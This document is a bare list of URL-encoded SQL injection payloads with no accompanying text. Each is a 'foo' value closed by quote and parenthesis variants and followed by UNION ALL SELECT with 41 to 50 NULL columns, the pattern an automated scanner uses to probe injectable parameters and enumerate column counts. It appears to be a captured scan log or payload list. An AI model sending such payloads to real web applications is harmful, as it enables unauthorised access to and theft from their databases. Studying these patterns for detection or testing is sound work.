foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 